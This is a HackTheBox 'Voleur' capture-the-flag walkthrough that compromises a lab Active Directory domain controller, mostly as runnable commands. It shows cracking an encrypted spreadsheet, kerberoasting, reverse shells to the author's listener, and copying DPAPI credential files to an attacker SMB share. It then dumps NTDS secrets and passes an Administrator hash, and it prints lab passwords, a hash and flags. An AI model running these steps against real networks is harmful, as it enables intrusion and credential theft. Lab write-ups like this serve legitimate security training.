Nmap Results

# Nmap 7.95 scan initiated Mon Jul  7 18:11:18 2025 as: /usr/lib/nmap/nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.129.57.144
Nmap scan report for 10.129.57.144
Host is up (0.016s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-08 06:12:30Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
2222/tcp  open  ssh           OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 42:40:39:30:d6:fc:44:95:37:e1:9b:88:0b:a2:d7:71 (RSA)
|   256 ae:d9:c2:b8:7d:65:6f:58:c8:f4:ae:4f:e4:e8:cd:94 (ECDSA)
|_  256 53:ad:6b:6c:ca:ae:1b:40:44:71:52:95:29:b1:bb:c1 (ED25519)
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49671/tcp open  msrpc         Microsoft Windows RPC
61513/tcp open  msrpc         Microsoft Windows RPC
61519/tcp open  msrpc         Microsoft Windows RPC
61540/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OSs: Windows, Linux; CPE: cpe:/o:microsoft:windows, cpe:/o:linux:linux_kernel

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-07-08T06:13:24
|_  start_date: N/A
|_clock-skew: 7h59m59s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jul  7 18:14:00 2025 -- 1 IP address (1 host up) scanned in 162.13 seconds

💡

Don't miss an opportunity to find some breadcrumbs and interesting information in the initial nmap scan output. We can see the LDAP domain of voleur.htb. We can also query the DNS hostname from the domain controller and add those to our /etc/hosts file.

sudo nmap -Pn -p389 --script ldap-rootdse 10.129.57.144 | grep dnsHostName

echo -e '10.129.57.144\t\tDC.voleur.htb voleur.htb' | sudo tee -a /etc/hosts

Service Enumeration

ℹ️

This is an assumed breach penetration test and credentials have been provided: ryan.naylor / HollowOct31Nyt.

TCP/445

Test Authentication

smbclient -U 'VOLEUR.HTB/ryan.naylor%HollowOct31Nyt' -L //DC.voleur.htb

I've seen this before and I suspect that NTLM authentication may be disabled

Set up your:

/etc/hosts file
Kerberos configuration file

Then, retry...

kinit ryan.naylor

List Shares

smbclient --use-kerberos=required -L //DC.voleur.htb

Some interesting shares that we may have access to:

HR
Finance
IT

I highly doubt we'll have access to C$ or ADMIN$ given this is a CTF and that'd be too easy.

smbclient --use-kerberos=required //DC.voleur.htb/HR

Map the HR share and explore

smbclient --use-kerberos=required //DC.voleur.htb/Finance

Same for Finance

smbclient --use-kerberos=required //DC.voleur.htb/IT

Same for IT

"Access_Review.xlsx" sounds interesting...

smb: \> cd "First-Line Support\"
smb: \> get Access_Review.xlsx

Crack the Encrypted File

That doesn't look like a normal Excel file...

pipx install msoffcrypto-tool

Install msoffcrypto-tool to attempt to crack the file

grep -vEa "\"|'" ~/Pentest/WordLists/rockyou.txt > wordlist.txt

Create a wordlist from rockyou.txt and filter out quotes, since xargs dislike those

awk '{print $0}' wordlist.txt | xargs -P 10 -I {} bash -c '/home/ben/.local/bin/msoffcrypto-tool Access_Review.xlsx cracked.xlsx -p "{}" 2>/dev/null && echo "Cracked with password: {}"'

Use the full path to msoffcrypto-tool when using the bash -c sub-shell command

Much better

Assemble Facts and Test Credentials

We already have the password for ryan.naylor, but interesting the account has pre-auth disabled
todd.wolfe:NightT1meP1dg3on14 (supposedly deleted, but may be able to restore)
jeremy.combs — can access Software folder
svc_ldap:M1XyC9pW7qT5Vn — likely service principal for LDAP
svc_iis:N5pXyW1VqM7CZ8 — likely service principal for web server

faketime nxc smb DC.voleur.htb -d 'voleur.htb' -u users.txt -p pass.txt -k --continue-on-success

Using faketime wrapper function documented here

Valid credentials found for three accounts

TCP/389

Now that we have some valuable intelligence, let's expand the attack surface a bit more by pulling some more data from LDAP.

Manual Enumeration

ldapsearch -Q -Y GSSAPI -H 'ldap://DC.voleur.htb' -b 'DC=voleur,DC=htb' '(objectClass=user)' > ldap_users.txt

Retrieve users from LDAP

ldapsearch -Q -Y GSSAPI -H 'ldap://DC.voleur.htb' -b 'DC=voleur,DC=htb' '(objectClass=group)' > ldap_groups.txt

Retrieve groups from LDAP

while read group ; do echo -e "${group}\n" ; ldapsearch -Q -Y GSSAPI -H ldap://DC.voleur.htb -b 'DC=voleur,DC=htb' "(sAMAccountName=${group})" | grep 'member: ' ; echo '' ; done < <(grep sAMAccountName ldap_groups.txt | cut -d ':' -f 2)

Retrieve members of each group from LDAP

I wrote about this in the HTB Vintage box, worth exploring more

"Tiered" access levels, but the "Restore_Users" group sounds particularly interesting

Find Deleted Objects

💡

Since we know that the svc_ldap user has some unique permissions regarding user restoration. Let's get a Kerberos ticket for svc_ldap and query the deleted objects in the domain.

kdestroy

kinit svc_ldap

Enter the password for svc_ldap

ldapsearch -Q -Y GSSAPI -H 'ldap://DC.voleur.htb' -b 'CN=Deleted Objects,DC=voleur,DC=htb' -s 'sub' -E '1.2.840.113556.1.4.417' '(objectClass=*)'

Indeed, we can read the deleted objects and verify that `todd.wolfe` has been tombstoned

ℹ️

I tried a few things to restore todd.wolfe using ldapmodify and a Python script generated with the help of AI. But, ldapmodify didn't support the extended LDAP controls and the Python script returned a LDAP error saying that svc_ldap had insufficient rights. So, I'll try and restore the user later when I get a shell on the box.

BloodHound

faketime nxc ldap DC.voleur.htb -d 'voleur.htb' -u 'svc_ldap' -p 'M1XyC9pW7qT5Vn' \
--dns-server 10.129.57.144 -k --bloodhound -c All

Again, using faketime wrapper function documented here

Import the `.zip` file to BloodHound and let's get busy

svc_ldap is a member of Restore_Users and has GenericWrite (or full control) over:
- lacey.miller
  - member of "Second-Line Technicians"
  - Access Reivew document says she is a WinRM user, but this is not correct
- Second-Line Support OU
svc_ldap also has WriteSPN on the svc_winrm account, so we could try doing some targeted kerberoasting as well

ℹ️

We also have control over ryan.naylor and svc_iis, but neither of those presented any interesting attack paths in BloodHound.

TCP/88

Since the Access_Review.xlsx document also mentioned that Kerberos pre-auth was disabled on ryan.naylor, I tried:

Making a list of users from the data in ldap_users.txt
Running impacket-GetNPUsers to see if anyone else had pre-auth disabled
No users were found to have this configuration

I also tried checking for Service Principals using impacket-GetUserSPNs but it seems the svc_ naming convention is just a coincidence and there are no users configured with SPNs in the domain.

Exploit

Abusing WriteSPN on svc_winrm

Automatically adds a SPN to the accounts where it has access and gets a TGS

john --wordlist=~/Pentest/WordLists/rockyou.txt --fork=4 hash.txt

WinRM Access

kinit svc_winrm

Enter password: AFireInsidedeOzarctica980219afi

KRB5CCNAME='/tmp/krb5cc_1001' evil-winrm -i 'DC.voleur.htb' -r voleur.htb  -u 'svc_winrm'

Post-Exploit Enumeration

Operating Environment

OS & Kernel

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
    SystemRoot    REG_SZ    C:\Windows
    BaseBuildRevisionNumber    REG_DWORD    0xb21
    BuildBranch    REG_SZ    fe_release
    BuildGUID    REG_SZ    ffffffff-ffff-ffff-ffff-ffffffffffff
    BuildLab    REG_SZ    20348.fe_release.210507-1500
    BuildLabEx    REG_SZ    20348.1.amd64fre.fe_release.210507-1500
    CompositionEditionID    REG_SZ    ServerStandard
    CurrentBuild    REG_SZ    20348
    CurrentBuildNumber    REG_SZ    20348
    CurrentMajorVersionNumber    REG_DWORD    0xa
    CurrentMinorVersionNumber    REG_DWORD    0x0
    CurrentType    REG_SZ    Multiprocessor Free
    CurrentVersion    REG_SZ    6.3
    DisplayVersion    REG_SZ    21H2
    EditionID    REG_SZ    ServerStandard
    EditionSubManufacturer    REG_SZ
    EditionSubstring    REG_SZ
    EditionSubVersion    REG_SZ
    InstallationType    REG_SZ    Server
    InstallDate    REG_DWORD    0x67993f82
    LCUVer    REG_SZ    10.0.20348.3807
    ProductName    REG_SZ    Windows Server 2022 Standard
    ReleaseId    REG_SZ    2009
    SoftwareType    REG_SZ    System
    UBR    REG_DWORD    0xedf
    PathName    REG_SZ    C:\Windows
    PendingInstall    REG_DWORD    0x0
    ProductId    REG_SZ    00454-20165-01481-AA962
    RegisteredOwner    REG_SZ    Windows User
    RegisteredOrganization    REG_SZ
    InstallTime    REG_QWORD    0x1db71c4224e0cec

Current User

USER INFORMATION
----------------

User Name        SID
================ ==============================================
voleur\svc_winrm S-1-5-21-3927696377-1337352550-2781715495-1601


GROUP INFORMATION
-----------------

Group Name                                  Type             SID          Attributes
=========================================== ================ ============ ==================================================
Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity  Well-known group S-1-18-1     Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Users and Groups

See ldapsearch artifacts.

Network Configurations

Network Interfaces

Windows IP Configuration


Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : .htb
   IPv4 Address. . . . . . . . . . . : 10.129.57.144
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : 10.129.0.1

Open Ports

TCP    0.0.0.0:22             0.0.0.0:0              LISTENING       6972

Processes and Services

ℹ️

We don't have access to CIM / WMI in our WinRM session, but I was still able to find some interesting things.

Interesting Processes

      0      40     1836       3600              6676   1 bash
      0      33      316       1144              6972   1 sshd
    163      10     1908       3564              5356   1 wsl
    125       7     1096       3156              6640   1 wslhost

Interesting Files

SMB Share Directories

C:\Finance
C:\HR
C:\IT

Privilege Escalation

Lateral to SVC_LDAP

Reverse PowerShell Session

Use SMB method to transfer files to target

Use `RunasCs.exe` to spawn a shell as `svc_ldap`

sudo rlwrap nc -lnvp 443

Start a TCP listener

.\runascs.exe svc_ldap 'M1XyC9pW7qT5Vn' powershell.exe -r 10.10.14.161:443

Make a callback to the listener as svc_ldap

Restore Todd Wolfe

Get-ADObject -IncludeDeletedObjects -Filter 'ObjectClass -eq "User" -and Deleted -eq $true' | Restore-ADObject

Restored `todd.wolfe` from the recycle bin

Reverse PowerShell as Todd Wolfe

ℹ️

Despite my best efforts to troubleshoot, I couldn't get evil-winrm to work with todd.wolfe Kerberos login. Didn't matter if I tried with kinit or impacket-getTGT.

Confirmed the login is valid for `todd.wolfe`, just not with WinRM for some reason

sudo rlwrap nc -lnvp 443

Start TCP listener to catch the reverse shell

.\runascs.exe 'todd.wolfe' 'NightT1meP1dg3on14' powershell.exe -r 10.10.14.161:443

Use runascs.exe in the evil-winrm shell running as svc_winrm

Appears to be an archive of Todd's directory under `C:\Users`

Found some DPAPI keys and creds while digging around

net use Y: \\10.10.14.161\EvilShare /user:secretuser 'secretpass'

Map my SMB server share under todd.wolfe session

cp 'C:\IT\Second-Line Support\Archived Users\todd.wolfe\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D' Y:\dpapi_loot

Copy to dpapi_loot directory on Kali

cp 'C:\IT\Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\Credentials\772275FAD58525253490A9B0039791D3' Y:\dpapi_loot

cp 'C:\IT\Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\Protect\S-1-5-21-3927696377-1337352550-2781715495-1110\08949382-134f-4c63-b93c-ce52efc0aa88' Y:\dpapi_loot

Decrypt DPAPI Credentials

impacket-dpapi masterkey -file 08949382-134f-4c63-b93c-ce52efc0aa88  -sid S-1-5-21-3927696377-1337352550-2781715495-1110 -password 'NightT1meP1dg3on14'

Decrypt the master key

Cached credential `772275FAD58525253490A9B0039791D3` is the most interesting here, as it looks like `jeremy.combs` credential was used at some point under Todd Wolfe's session

Lateral to Jeremy Combs

faketime nxc ldap DC.voleur.htb -k -d 'voleur.htb' -u 'jeremy.combs' -p 'qT3V9pLXyN7W4m'

kinit jeremy.combs

export KRB5CCNAME=/tmp/krb5cc_1001

Jeremy,

I've had enough of Windows Backup! I've part configured WSL to see if we can utilize any of the backup tools from Linux.

Please see what you can set up.

Thanks,

Admin

Note.txt.txt

id_rsa

Lateral to svc_backup

for user in $(cat users.txt) ; do ssh -i id_rsa -p 2222 "$user"@DC.voleur.htb ; done

Loop through users and gain access as `svc_backup`

Running the `mount` command, we can see `C:` mapped to `/mnt/c`

find / -type f -writable 2>/dev/null | grep -vE '/proc|/sys'

scp -r -i id_rsa -P 2222 svc_backup@DC.voleur.htb:"/mnt/c/IT/Third-Line Support/Backups/" .

Recursively copy the files locally

impacket-secretsdump -system Backups/registry/SYSTEM -ntds Backups/Active\ Directory/ntds.dit LOCAL

Becoming Domain Admin

faketime impacket-getTGT -hashes ':e656e07c56d831611b577b160b259ad2' 'voleur.htb/Administrator'

Again, using faketime wrapper function documented here

KRB5CCNAME=Administrator.ccache faketime impacket-psexec -k -no-pass 'voleur.htb/Administrator'@DC.voleur.htb

Flags

User

83a68a24fa951a0769e3fb93b2b5b94c

Root

fc20fd8ee300307c6f7744bf126cec9e

HackTheBox | Voleur